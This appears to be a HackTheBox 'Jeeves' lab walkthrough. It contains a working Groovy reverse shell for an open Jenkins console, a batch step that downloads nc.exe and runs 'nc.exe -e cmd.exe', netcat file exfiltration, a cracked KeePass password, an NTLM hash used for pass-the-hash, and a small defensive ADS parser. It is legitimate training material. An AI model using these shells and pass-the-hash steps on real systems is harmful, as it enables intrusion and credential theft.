MACHINE Windows HackTheBox 3/5

HackTheBox: Jeeves

2026-06-08 7 min read
Tracks CPTS
Services jenkins

Introduction

Jeeves is a Windows machine with a few classic techniques that beginners often haven’t seen before. The path to root:

  1. Enumeration → find a Jenkins server hiding on a non-standard port
  2. Foothold → use Jenkins’ built-in script runner to get a reverse shell as kohsuke
  3. Lateral movement → find a KeePass database, crack it, extract an NTLM hash
  4. Admin shell → pass-the-hash to get a shell as Administrator
  5. Root flag → it’s hidden in an Alternate Data Stream (a sneaky Windows trick)

Key Concepts

What is Jenkins? A CI/CD automation tool that lets developers run scripts and build pipelines. If it’s left open with no login required, anyone can run commands on the server - which is exactly what happens here.

What is KeePass? A password manager that stores passwords in an encrypted .kdbx file. If you can crack the master password, you get everything inside.

What is Pass-the-Hash? On Windows, you don’t always need a plaintext password to authenticate - you can use the password’s NTLM hash directly. This is called Pass-the-Hash (PTH).

What is an Alternate Data Stream (ADS)? Windows NTFS files can secretly carry hidden data attached to them. A file called hm.txt can have a hidden stream called root.txt that doesn’t show up with a normal dir command. This is how the root flag is hidden on this box.


Enumeration

Nmap: scan all ports

nmap -p 1-65535 -T4 -A -v <TARGET>

Open ports:

Port    Service
80      Microsoft IIS 10.0
135     Windows RPC
445     SMB (Windows file sharing)
50000   Jetty 9.4 HTTP server  ← interesting!

Port 80 is a dead end - it just shows a fake “Ask Jeeves” error page. The interesting one is port 50000, which is running a Jetty web server.

Fuzz port 50000 for hidden directories

Port 50000 returns nothing at the root. Use feroxbuster (or dirbuster) to find hidden paths:

feroxbuster -u http://<TARGET>:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Finds: http://<TARGET>:50000/askjeeves

What is feroxbuster? A tool that automatically tries thousands of directory names to find hidden pages on a web server. Think of it as knocking on every door.

Navigate to http://<TARGET>:50000/askjeeves - you’re greeted with a Jenkins dashboard, with no login required.


Foothold: Shell via Jenkins Script Console

What is the Jenkins Script Console?

Jenkins has a built-in Groovy script console at /askjeeves/script that can run arbitrary code on the server. Since there’s no authentication, we have direct code execution.

Option A: Groovy reverse shell (cleanest method)

Go to: http://<TARGET>:50000/askjeeves/script

Start your listener:

nc -nvlp 1234

Paste and run this Groovy script (replace the IP with your tun0 address):

String host = "<YOUR_IP>";
int port = 1234;
String cmd = "cmd.exe";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush(); po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy(); s.close();

Option B: Jenkins Build Step + Netcat (original method from the writeup)

If the script console isn’t available, you can use Jenkins’ New Item → Build → Execute Windows batch command feature instead.

Step 1: Host nc.exe on your machine:

# Download nc.exe for Windows first:
# https://eternallybored.org/misc/netcat/
python3 -m http.server 80

Step 2: Start your listener:

nc -nvlp 1234

Step 3: In Jenkins, go to New Item → name it anything → Freestyle project → OK. Scroll to Build → Add build step → Execute Windows batch command. Paste:

powershell wget "http://<YOUR_IP>/nc.exe" -outfile "nc.exe"
nc.exe -e cmd.exe <YOUR_IP> 1234

Click Save, then Build Now.

You get a shell as jeeves\kohsuke.

C:\Users\kohsuke\Documents> whoami
jeeves\kohsuke

Find the KeePass Database

Browse around kohsuke’s files:

cd C:\Users\kohsuke
dir /s /b

You’ll find: C:\Users\kohsuke\Documents\CEH.kdbx

What is a .kdbx file? It’s a KeePass password database. It’s encrypted, but if you crack the master password, you get all the stored passwords inside.

Transfer the file to your machine

On your machine - listen for incoming file:

nc -lp 1235 > jeeves.kdbx

On the target - send the file:

nc.exe -w 3 <YOUR_IP> 1235 < CEH.kdbx

-w 3 means “close the connection after 3 seconds of inactivity” - this stops the transfer hanging.


Crack the KeePass Database

Extract the hash

keepass2john jeeves.kdbx > jeeves.hash

What does this do? KeePass protects the database with a master password. keepass2john pulls out the encrypted portion in a format that John the Ripper can crack.

Crack it

john jeeves.hash --wordlist=/usr/share/wordlists/rockyou.txt

Password: moonshine1

Open the database

Install KeePass on your machine, open jeeves.kdbx, and enter moonshine1. You’ll see several entries. The only one that matters is “Backup stuff”:

Username: ?
Password: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

Wait - that’s not a normal password! That’s an NTLM hash. The format is LM_hash:NT_hash. The LM part (aad3b435...) is a dummy value (Windows stopped using LM hashes years ago). The important part is the NT hash after the colon: e0fb1fb85756c24235ff238cbe81fe00. This is the Administrator’s password hash.


Pass-the-Hash → Shell as Administrator

What is Pass-the-Hash?

When Windows authenticates users over the network (SMB, WinRM, etc.), the client never sends the plaintext password - it proves knowledge of the NTLM hash in a challenge-response exchange. So if you have the hash, you can authenticate without ever knowing the actual password. This is a Pass-the-Hash (PTH) attack.

Get a shell

pth-winexe -U jeeves/Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //<TARGET> cmd

Breaking this down:

  • pth-winexe - a tool that uses PTH to run a command remotely via SMB
  • -U jeeves/Administrator%<LM>:<NT> - domain\user + the hash (LM:NT format)
  • //<TARGET> cmd - target IP, run cmd.exe

You get a shell as Administrator:

C:\Windows\system32> whoami
jeeves\administrator

Alternative using impacket (more common today):

impacket-psexec Administrator@<TARGET> -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

Root Flag: Hidden in an Alternate Data Stream

You’re Administrator, but where’s root.txt? On the Desktop you’ll find hm.txt, but it only contains a hint:

C:\Users\Administrator\Desktop> more hm.txt
The flag is elsewhere.  Look deeper.

Find the hidden stream

dir /R

Output:

11/03/2017  09:58 PM                 0 hm.txt
                                    34 hm.txt:root.txt:$DATA

That hm.txt:root.txt:$DATA line reveals a hidden Alternate Data Stream called root.txt attached to hm.txt.

What is an Alternate Data Stream? NTFS (the Windows file system) lets files carry hidden extra data attached to them. The file looks empty normally, but there’s secret content hidden in a named “stream”. Regular dir hides them - dir /R shows them.

Read the hidden stream

powershell Get-Content -Path "hm.txt" -Stream "root.txt"

You get the root flag.
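As an added defender-side example (not from the original writeup), here is a small Python parser that triages captured `dir /R` output and flags non-default streams, ignoring the benign Zone.Identifier download marker. The sample listing, the setup.exe entry and the allow-list are constructed for illustration:

```python
import re
from dataclasses import dataclass

# One `dir /R` stream line: optional leading spaces, a size, then file:stream:$DATA.
# The default unnamed stream is the plain file line, so any line ending in
# ":<name>:$DATA" is an alternate data stream.
STREAM_LINE = re.compile(r"^\s*(\d[\d,]*)\s+(.+?):([^:\\/]+):\$DATA\s*$")

# Streams expected on ordinary Windows hosts (hypothetical allow-list for this
# example; extend it for your environment).
BENIGN_STREAMS = {"Zone.Identifier"}


@dataclass(frozen=True)
class AdsEntry:
    file_name: str
    stream_name: str
    size: int


def parse_dir_r(output: str) -> list[AdsEntry]:
    """Extract alternate data streams from captured `dir /R` output."""
    entries = []
    for line in output.splitlines():
        m = STREAM_LINE.match(line)
        if m:
            size = int(m.group(1).replace(",", ""))
            entries.append(AdsEntry(m.group(2), m.group(3), size))
    return entries


def suspicious_streams(entries: list[AdsEntry]) -> list[AdsEntry]:
    """Keep non-empty streams whose name is not on the allow-list."""
    return [e for e in entries if e.stream_name not in BENIGN_STREAMS and e.size > 0]


# Constructed sample: the two Desktop lines from the writeup plus a typical
# downloaded binary carrying a Zone.Identifier marker.
SAMPLE_DIR_R = """\
 Directory of C:\\Users\\Administrator\\Desktop

11/03/2017  09:58 PM                 0 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/02/2017  01:10 PM             8,192 setup.exe
                                    26 setup.exe:Zone.Identifier:$DATA
               2 File(s)          8,192 bytes
"""

if __name__ == "__main__":
    for e in suspicious_streams(parse_dir_r(SAMPLE_DIR_R)):
        print(f"{e.file_name} carries hidden stream '{e.stream_name}' ({e.size} bytes)")
```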


Summary

nmap → port 50000 (Jetty)

feroxbuster → /askjeeves → Jenkins (no login)

Jenkins Script Console → Groovy reverse shell → shell as kohsuke

C:\Users\kohsuke\Documents\CEH.kdbx → transfer to attacker

keepass2john + john → master password: moonshine1

KeePass "Backup stuff" entry → NTLM hash: e0fb1fb85756c24235ff238cbe81fe00

pth-winexe / psexec → Pass-the-Hash → shell as Administrator

dir /R on Desktop → hm.txt:root.txt:$DATA (Alternate Data Stream)

Get-Content -Stream "root.txt" → root flag

Tools Used

Tool               What it does                                How to get it
feroxbuster        Fast directory/file fuzzer                  sudo apt install feroxbuster
nc.exe (Windows)   Netcat for Windows - reverse shells         eternallybored.org
keepass2john       Extracts crackable hash from .kdbx files    Built into Kali (john suite)
john               Password cracker                            sudo apt install john
KeePass            Opens .kdbx password databases              sudo apt install keepass2
pth-winexe         Pass-the-Hash remote shell via SMB          Built into Kali
impacket-psexec    Modern PTH alternative                      pip install impacket